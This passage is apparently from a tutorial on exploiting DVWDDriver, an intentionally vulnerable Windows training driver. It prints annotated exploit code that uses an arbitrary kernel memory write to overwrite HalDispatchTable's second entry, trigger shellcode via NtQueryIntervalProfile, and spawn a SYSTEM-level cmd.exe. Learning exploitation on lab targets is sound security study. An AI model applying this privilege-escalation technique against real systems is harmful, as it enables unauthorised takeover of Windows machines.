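The address computation of step 1 boils down to simple offset arithmetic, sketched below on 32-bit integers. `rebase_symbol` and `table_entry_address` are hypothetical helpers, and the base addresses in the usage note are made-up values; how the real bases are obtained is outside the scope of this sketch.

```c
#include <assert.h>
#include <stdint.h>

/* Translate the address of a symbol found in a userland copy of a module
 * into its address in the kernel's own mapping of the same module. */
uint32_t rebase_symbol(uint32_t user_base, uint32_t user_symbol,
                       uint32_t kernel_base) {
    uint32_t offset;
    assert(user_symbol >= user_base);
    offset = user_symbol - user_base;   /* offset of the symbol in the image */
    return kernel_base + offset;
}

/* Address of entry `index` in a table of 32-bit pointers. */
uint32_t table_entry_address(uint32_t table, uint32_t index) {
    return table + index * (uint32_t)sizeof(uint32_t);
}
```

For instance, if the userland copy were mapped at 0x00400000 with HalDispatchTable at 0x0046C8A0, and the kernel image were loaded at 0x804D7000, `rebase_symbol` would return 0x805438A0. The second entry, obtained with `table_entry_address(0x805438A0, 1)`, would then be at 0x805438A4, i.e. the table address + 0x4.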
        A global overview is given in the following figure taken from [2]


          5. Exploit code

          Here is the code of the exploit developed by the authors of DVWDDriver. While reading that code, I added many comments to make sure I understood everything it does. With the previous explanation, it should be quite easy to follow; nothing is very tricky here =)

          // ----------------------------------------------------------------------------
          // Arbitrary Memory Overwrite exploitation ------------------------------------
          // ---- HalDispatchTable pointer overwrite method -----------------------------
          // ----------------------------------------------------------------------------
          
          
          // Overwrite kernel dispatch table HalDispatchTable's second entry:
          //  - STORE copies the address of the shellcode (a userland address) into the kernel buffer
          //  - OVERWRITE copies that buffer over the second pointer in the HalDispatchTable
          BOOL OverwriteHalDispatchTable(ULONG_PTR HalDispatchTableTarget, ULONG_PTR ShellcodeAddrStorage) {
          
           HANDLE hFile;
           BOOL ret;
           DWORD dwReturn;
           ARBITRARY_OVERWRITE_STRUCT overwrite;
          
           // Open handle to the driver
           hFile = CreateFile(L"\\\\.\\DVWD", 
                  GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
                  NULL, 
                  OPEN_EXISTING, 
                  0, 
                  NULL);
          
           if(hFile != INVALID_HANDLE_VALUE) {
           
            // DEVICEIO_DVWD_STORE
            // -> store the address of the shellcode into kernelland (GlobalOverwriteStruct) 
            overwrite.Size = 4;
            overwrite.StorePtr = (PVOID)&ShellcodeAddrStorage;
            ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
          
            // DEVICEIO_DVWD_OVERWRITE 
            // -> copy the content of the buffer in kernelland (the address previously added)
            // to the location HalDispatchTableTarget (second entry in the HalDispatchTable)
            overwrite.Size = 4;
            overwrite.StorePtr = (PVOID)HalDispatchTableTarget;
            ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
          
            CloseHandle(hFile);
            
            return TRUE;
           }
          
           return FALSE;  
          }
          
          
          
          typedef NTSTATUS (__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval);
          BOOL TriggerOverwrite32_NtQueryIntervalProfileWay() {
          
           ULONG dummy = 0;
           ULONG_PTR HalDispatchTableTarget;
           ULONG_PTR ShellcodeAddrStorage; 
          
           _NtQueryIntervalProfile NtQueryIntervalProfile;
          
           // Load the Kernel Executive ntoskrnl.exe in userland and get the kernel addresses of some symbols
           if(LoadAndGetKernelBase() == FALSE) {
            return FALSE;
           }
          
           // Retrieve the address of the shellcode
           ShellcodeAddrStorage = (ULONG_PTR)UserShellcodeSIDListPatchUser4Args;
           
           // Retrieve the address of the second entry within the HalDispatchTable
           HalDispatchTableTarget = HalDispatchTable + sizeof(ULONG_PTR);
           
           // Retrieve the address of the syscall NtQueryIntervalProfile within ntdll.dll
           NtQueryIntervalProfile  = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
           if(!NtQueryIntervalProfile)
            return FALSE;
          
           // Overwrite the pointer in HalDispatchTable
           if(OverwriteHalDispatchTable(HalDispatchTableTarget, ShellcodeAddrStorage) == FALSE) {
            return FALSE;
           }
          
           // Call the function in order to launch our shellcode
           // kd> u nt!KeQueryIntervalProfile
           NtQueryIntervalProfile(2, &dummy);
          
           if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
            wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
            return FALSE;
           }
          
           return TRUE;
          }
          

          6. w00t ?

          It's time to try the exploit:
          DVWDExploit.exe --exploit-overwrite-profile-32


          Yeah !! we spawn a shell cmd.exe that is running with NT AUTHORITY\SYSTEM privileges. w00t =)


          References

          [1] SSDT Uninformed article
          http://uninformed.org/index.cgi?v=8&a=2&p=10

          [2] Exploiting Common Flaws in Drivers, by Ruben Santamarta
          http://reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1

          [3] NtQueryIntervalProfile(),
          http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Profile/NtQueryIntervalProfile.html

          [4] Windows Internals, book by Mark Russinovich & David Solomon